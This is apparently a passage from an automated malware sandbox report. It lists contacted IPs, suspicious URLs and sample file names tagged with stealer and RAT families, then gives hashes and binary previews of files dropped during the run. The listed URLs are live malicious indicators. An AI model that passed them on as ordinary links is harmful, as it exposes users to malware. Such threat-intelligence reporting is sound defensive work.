                                                                                                                                          fp2e7a.wpc.phicdn.nethttps://nd5.spartanspirits.com/wp-content/plugins/z-downloads/index.php?token=yAMea6mWC29JnGayuerYGet hashmaliciousUnknownBrowse
                                                                                                                                          • 192.229.221.95
                                                                                                                                          http://email.uhigherdev.com/c/eJwczLEOgyAQANCvgdHcHQgyMHThPxAPMa2VIJr075t2fslb_MjGoWSPVoFDa42RxYOdlUVlFHKOal50igg5MQA4oBnl5glII4LBiRyZQRvMo4vTBJgcUxYarrKthdvC95COXb586b2eQj0EBUFhj--4xnbVnwoKw9njR1CQzZ9XrUfrQgP2LT25_4Pb0zcAAP__PhEzCQGet hashmaliciousUnknownBrowse
                                                                                                                                          • 192.229.221.95
                                                                                                                                          http://www.creativeformatsnetwork.com/690e2a7d88062e0c7bf23f5d01b4ab6b/invoke.jsGet hashmaliciousUnknownBrowse
                                                                                                                                          • 192.229.221.95
                                                                                                                                          https://issuu.com/onlinedocumentpdf/docs/documentation?fr=xKAE9_zU1NQGet hashmaliciousUnknownBrowse
                                                                                                                                          • 192.229.221.95
                                                                                                                                          Attachment-551059325-009.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 192.229.221.95
                                                                                                                                          https://truckstop.one/as/authorize?client_id=7a99fb37-0cbd-4526-a557-bd283b9e9cf4&redirect_uri=https%253a%252f%252fapp.truckstop.com%252flanding%252fpingexternallogincallback&response_type=code%2520id_token%2520token&state=openidconnect.authenticationproperties%253dd1azkrievou5xvfp-qj6lz4lvhnji_zurlus4dg4kpfyaz8_l_zh9eagafd4qs-4bp_xmv_gxhfi9cicmwuipdyvxvvyerzotaovt3vtqf9ajzj3wmqtyitt_jeovipdmigoy5j_5dpehnbhcu93ulmdxyuni7lptn61kjfj7vt78qwvlvinfcjk1ngsl46tbysxh2azfm_i1dlik1uodaqthlvy6gtmnpueowutlftvhwsb7ejrpju0ggwa6pbfqx5adq&response_mode=form_post&nonce=638448261415283047.mdq2yjfinjytmwrjyi00ote4lwi3yjitodyzytm5ymu3mdbmotkxmzeyzdmtmzm5nc00yzq2lthlnjktmdvindc5njg3owjk&x-client-sku=id_net461&x-client-ver=7.0.1.0Get hashmaliciousUnknownBrowse
                                                                                                                                          • 192.229.221.95
                                                                                                                                          http://ebook-hunter.orgGet hashmaliciousUnknownBrowse
                                                                                                                                          • 192.229.221.95
                                                                                                                                          https://portafirmas.metromadrid.net/Get hashmaliciousUnknownBrowse
                                                                                                                                          • 192.229.221.95
                                                                                                                                          https://airtable.com/appghQwrDrrrgLn7v/shrt3wUeRvHDcMT9uGet hashmaliciousUnknownBrowse
                                                                                                                                          • 192.229.221.95
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          CLOUDFLARENETUShttps://nd5.spartanspirits.com/wp-content/plugins/z-downloads/index.php?token=yAMea6mWC29JnGayuerYGet hashmaliciousUnknownBrowse
                                                                                                                                          • 188.114.97.3
                                                                                                                                          http://email.uhigherdev.com/c/eJwczLEOgyAQANCvgdHcHQgyMHThPxAPMa2VIJr075t2fslb_MjGoWSPVoFDa42RxYOdlUVlFHKOal50igg5MQA4oBnl5glII4LBiRyZQRvMo4vTBJgcUxYarrKthdvC95COXb586b2eQj0EBUFhj--4xnbVnwoKw9njR1CQzZ9XrUfrQgP2LT25_4Pb0zcAAP__PhEzCQGet hashmaliciousUnknownBrowse
                                                                                                                                          • 188.114.96.3
                                                                                                                                          7IXl1M9JGV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 104.21.19.177
                                                                                                                                          vUWhc67uSc.exeGet hashmaliciousStormKittyBrowse
                                                                                                                                          • 172.67.74.152
                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 172.67.133.135
                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                          • 104.21.5.155
                                                                                                                                          Invoice-250288895-001-4031394-5629578.jsGet hashmaliciousUnknownBrowse
                                                                                                                                          • 188.114.97.3
                                                                                                                                          vUWhc67uSc.exeGet hashmaliciousStormKittyBrowse
                                                                                                                                          • 172.67.74.152
                                                                                                                                          https://issuu.com/onlinedocumentpdf/docs/documentation?fr=xKAE9_zU1NQGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.17.24.14
                                                                                                                                          YANINA-ASUA2pFytt52ws.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 91.219.60.67
                                                                                                                                          http://unsubscribe-me-now.netGet hashmaliciousUnknownBrowse
                                                                                                                                          • 62.182.81.132
                                                                                                                                          11068-1106811068-11068.lnkGet hashmaliciousNetSupport RAT, NetSupport Downloader, MalLnkBrowse
                                                                                                                                          • 31.42.177.233
                                                                                                                                          BWV4hz5GdR.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, Stealc, XmrigBrowse
                                                                                                                                          • 62.182.80.202
                                                                                                                                          lxGAurRKvR.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, Stealc, XmrigBrowse
                                                                                                                                          • 62.182.80.202
                                                                                                                                          xZnG1FFx7L.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                          • 62.182.80.202
                                                                                                                                          KWwpSm0Cec.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Stealc, VidarBrowse
                                                                                                                                          • 62.182.80.202
                                                                                                                                          SKHOtnHl7J.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                          • 62.182.80.202
                                                                                                                                          TiFfbUw37Q.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                          • 62.182.80.202
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          3b5074b1b5d032e5620f69f9f700ff0evMRlWtVCEN.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                          • 172.67.182.214
                                                                                                                                          batterygetbackwithgoodmovemententirelovegoodforrealitytogetmeack.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                                                                                                          • 172.67.182.214
                                                                                                                                          seethebestpartentirelifewithmygirlfriendonentirelifethings.htaGet hashmaliciousCobalt Strike, HTMLPhisher, Lokibot, Strela StealerBrowse
                                                                                                                                          • 172.67.182.214
                                                                                                                                          http://eon.keit.re.kr/WEOMTRACK.html?CPKN=O&CPSQ=88327186&CPSC=0&CPID=16122900000005&CPMEM=MTAwMDkwODg%3D&CLID=006&CLKN=CL&CPCED=20171231&DRTMF=5&DRTMT=60&URL=https://form.jotform.com/243104959551055Get hashmaliciousUnknownBrowse
                                                                                                                                          • 172.67.182.214
                                                                                                                                          Copia pendiente de pago Proveedor 107924.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          • 172.67.182.214
                                                                                                                                          PO#7372732993039398372372973928392832973PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          • 172.67.182.214
                                                                                                                                          ALI HASSO - P02515 & P02518.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          • 172.67.182.214
                                                                                                                                          QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 172.67.182.214
                                                                                                                                          G72Zpzru1g.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                          • 172.67.182.214
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exestatments.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                            Scanned01Document_ms.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                              Scanned01Document_ms.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                sstatment.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                  extukGiBrn.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                    Vh0tTzx4Ko.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                      support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                        support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                          ScreenConnect.ClientSetup (1).exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                            C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exestatments.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                              Scanned01Document_ms.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                Scanned01Document_ms.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                  sstatment.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                    extukGiBrn.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                      Vh0tTzx4Ko.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                        support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                          support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                            ScreenConnect.ClientSetup (1).exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                              Entropy (8bit):0.3588072191296206
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:6xkoaaD0JOCEfMuaaD0JOCEfMKQmDhxkoaaD0JOCEfMuaaD0JOCEfMKQmD:maaD0JcaaD0JwQQ3aaD0JcaaD0JwQQ
                                                                                                                                                                              MD5:663C5D6018506231E334FB3EA962ED1C
                                                                                                                                                                              SHA1:539A4641CE92E57E4ADEE32750A817326E596D4C
                                                                                                                                                                              SHA-256:066CB701C03237D2612AA647E6BF08EF594360F96E433639B0CC9EED7335F1E1
                                                                                                                                                                              SHA-512:5F910653FD1B12B94D314EDEDF6EB2BEC70D369D921EB5B7CF4D199B0374D6C798336E39DBF2781F3B0457280E0DDA63BDF4861DF31C08152544B0F1039D5FCD
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:*.>.................D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1310720
                                                                                                                                                                              Entropy (8bit):0.8337324322656293
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDug9:gJjJGtpTq2yv1AuNZRY3diu8iBVqFf
                                                                                                                                                                              MD5:B0DF559D48CCBCFF5595A5046CE23FDE
                                                                                                                                                                              SHA1:B7EEEF3F04D10E3DD0C1EF8E70203AF57F524B47
                                                                                                                                                                              SHA-256:2C0DDCF23CDA73A4065ACC7C486671B4869E52B7417BC295A7A892D07C4E6E77
                                                                                                                                                                              SHA-512:05697CB544F0883563DA04991D3AC40F6E709DD646AAECFE7FDE00D7C651B3037647515E06635C7C2A87A727E18D326EECC6FACE8D2D9B075482D89089BB13C8
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x1a78c5f8, page size 16384, Windows version 10.0
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1310720
                                                                                                                                                                              Entropy (8bit):0.6585010691219028
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:BSB2ESB2SSjlK/AxrO1T1B0CZSJWYkr3g16n2UPkLk+kdbI/0uznv0M1Dn/didMV:Baza6xhzA2U8HDnAPZ4PZf9h/9h
                                                                                                                                                                              MD5:83CEF5C9D19FD27677B5999030101F73
                                                                                                                                                                              SHA1:47FFBC2A1CE385AF941E71BE97017F3C49ADCE46
                                                                                                                                                                              SHA-256:777A460CD93615B102AA704E8783CBE568ADE2F0604B844E8C6A8A5DE262BA55
                                                                                                                                                                              SHA-512:6F228FD6BE576BC762CFEAFF087E8402C1AB14133A9DA82DF850D93A184FBC3708DF40587DB59AF325C7AB3AC9CD253DD34C48B50F3B0879F5CDC77EB25A7BD7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.x..... ...............X\...;...{......................T.~..........|.......|..h.|..........|..T.~.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{..........................................|...................f.......|...........................#......T.~.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):16384
                                                                                                                                                                              Entropy (8bit):0.08036877904048498
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:P/lWetYeAiNALER/lX+ICETxaL/MgIwR/lall58Kgvvl/QoeP/ll:Pdz8LAx+ICSGbIcAz8KgR+t
                                                                                                                                                                              MD5:F4B2229FAF91636F7C49D74192363B78
                                                                                                                                                                              SHA1:F580F355AAFAEE03A1E4955B00201D6B797852CE
                                                                                                                                                                              SHA-256:F72A9E3A1AB402A7DC7058176E3AD1A27C7B344D546C49108BDD9B8A38A48595
                                                                                                                                                                              SHA-512:9909EF756B8474830896A34775E0AFE85AC6640D0D13395FC67E79339A39BF8DEA3B3F20B88748E1CE7190B5520C6935FFD721FEF63411E95D35FD76AB49DAFA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.(.......................................;...{.......|.......|...............|c......|...........|...................f.......|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                              Entropy (8bit):0.8983528544211888
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:PMFOH3swhqvGXyf8QXIDcQvc6QcEVcw3cE/n+HbHg/JgnQoFyOuawrn5kBu77oww:UUH3sP0BU/gjExlzuiFPZ24IO8r
                                                                                                                                                                              MD5:4FE7480742B52ED435A29A7A573BB65F
                                                                                                                                                                              SHA1:F7CFAA2DF0CB27E88FB97597EBA355328855F0CA
                                                                                                                                                                              SHA-256:C83EBEAF81BE4132C7901E9CE30653D104E453659943746E66AB16021FBD1693
                                                                                                                                                                              SHA-512:550838D310EF5D6E015ADA3937BC9A646465484D415ABCC49AF4CAFA054A4D721EA54FD814B24F22ECDCD2312FCB0EEF0F03502EADE9702DB6858FA9711F3FA0
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.4.7.2.6.9.5.7.7.4.0.7.6.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.4.7.2.6.9.7.3.9.9.0.8.5.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.b.a.b.6.c.2.5.-.3.7.5.9.-.4.1.c.b.-.8.4.f.1.-.c.f.d.5.8.4.c.d.6.7.7.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.f.3.e.9.6.c.1.-.e.c.6.1.-.4.a.e.8.-.8.4.d.8.-.3.7.e.d.e.c.e.5.c.3.f.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.p.z.P.O.9.7.Q.o.u.M...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.e.0.-.0.0.0.1.-.0.0.1.4.-.c.8.1.5.-.3.3.1.0.3.7.3.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.0.a.7.6.e.a.1.9.d.9.e.8.2.e.9.1.5.2.6.9.9.e.2.7.7.e.e.6.a.4.f.0.0.0.0.f.f.f.f.!.0.0.0.0.b.2.a.6.e.7.5.a.d.e.1.8.f.1.0.e.2.d.0.c.d.7.0.9.6.3.0.f.5.e.5.5.1.d.b.c.e.f.a.e.!.p.z.P.O.9.7.Q.o.u.M...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              File Type:Mini DuMP crash report, 15 streams, Thu Nov 7 17:04:56 2024, 0x1205a4 type
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):77858
                                                                                                                                                                              Entropy (8bit):1.665341212541505
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:192:7/+AXaIX206OEI/yyl2KCRXm0MguMflmrW5w7uSkCGqe1rMGCE:iZ8EI/vDq20Mgu25w7uckr
                                                                                                                                                                              MD5:272DDB611861A2010D0C521AE726C950
                                                                                                                                                                              SHA1:69ACDFA1BB1AF5462EDF2C094732AA310FCB22BD
                                                                                                                                                                              SHA-256:DC7E2020B55C01AD4952F687D119B726F4A5F4572FE69D6D9202D5B3A6C254F1
                                                                                                                                                                              SHA-512:7F68AE87D6330102BEB65BA5E0F15D4384E73658C86EF85CDA41B54CA2DE01D51E3AEB43817CC715792AD00EE3023D0900C1CE9C81F0C0155D69C422FF7F1582
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:MDMP..a..... .......8.,g............T...............h.......<...$...........<8..........`.......8...........T...........h ..............`...........L...............................................................................eJ..............GenuineIntel............T.............,g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):8326
                                                                                                                                                                              Entropy (8bit):3.7002203707437924
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:192:R6l7wVeJSt6i6YEI4SU99tgmfEtRprv89bQ2sf1CQm:R6lXJA6i6YEHSU99tgmfEtcQVf6
                                                                                                                                                                              MD5:5F122BC6EB60F89652AEBF98095905B9
                                                                                                                                                                              SHA1:205313F2C6BC5B23EFB4323F941870EAEF8F9E0C
                                                                                                                                                                              SHA-256:BEEA03860BF8F538BCA293B42699B8E8A621890C111EA43EAA5B6E371A9A7092
                                                                                                                                                                              SHA-512:935C29B2B4FA39949B8F95DF8416F75F6F18980CD28A8870A5323F79F36A6E97A597FD55194DD04506C98569742183024D92874754EB2A1818877E2A863FF344
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.8.5.6.<./.P.i.
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4593
                                                                                                                                                                              Entropy (8bit):4.483823828949974
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:cvIwWl8zstJg77aI9PMWpW8VYuYm8M4JQQLFH+q83ALBwkeid:uIjfHI79l7VOJQ+VFVeid
                                                                                                                                                                              MD5:BB71EAF2682465FA68D59428880B5E1A
                                                                                                                                                                              SHA1:5D06E96BFC8964FB1F999E448AF25811622931BB
                                                                                                                                                                              SHA-256:AB8E9242614F6AD335FBA5A377522337FF39CFD3F02134904B2585B09FAAC6C2
                                                                                                                                                                              SHA-512:6C5C11316A4836A539F52406187D9494410241D13D5EE4EB2A9399B6A02BAF2E7685253A9B3368CDE0F3D21045F5DFAE7AA99C274633DDB3FBA12A91A8B073AC
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="577927" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):77522
                                                                                                                                                                              Entropy (8bit):3.0517256042644094
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:wYZZfEMkGFu8W++y/VWJGcY9aZ7Z4H//CnDRZV8:9ZZfEMkGFb+2eLY9aZ4//8Dvq
                                                                                                                                                                              MD5:FCB5BB1CE71B042708002F95E2EC0D5B
                                                                                                                                                                              SHA1:CEC600C16728EE421C556C990A1ABFDF2AC003C5
                                                                                                                                                                              SHA-256:21B9658D784CCA309D1E544F16F17073BA7E5B00968EB43F2026A2343D67D9DA
                                                                                                                                                                              SHA-512:D41B7CAA26506059C400A7DF659F0092D71F70767D04F2CBFA29D067E3159031C1656F3E093CA63E2A95AB53DC85D1E196935217A2C327ADD9F52997FEE798EA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):13340
                                                                                                                                                                              Entropy (8bit):2.6850626752335374
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:TiZYWIe6S8CdYLYnW9lH4YEZcztCip3tCBBwihAvamK8M0sFIz73:2ZDIuc/gR8amK8M0saz73
                                                                                                                                                                              MD5:7E12436D1893CB0129A78260ADE191CD
                                                                                                                                                                              SHA1:01EE9000472C4AED9EA1E4718391D22EC2EC3D3D
                                                                                                                                                                              SHA-256:14894776979389777726C16917CDB8BFD10CE6E69574D405D0E8190EF4745118
                                                                                                                                                                              SHA-512:40C3618DB21FAEB83BBF5D208611159CA3B081FD33384ABF68A49F53CD2FF29CCE3790D70A0C43403420D2C6E7E5E8EA3980B152F8A96A1CD40A924808EB1451
                                                                                                                                                                              Malicious:false
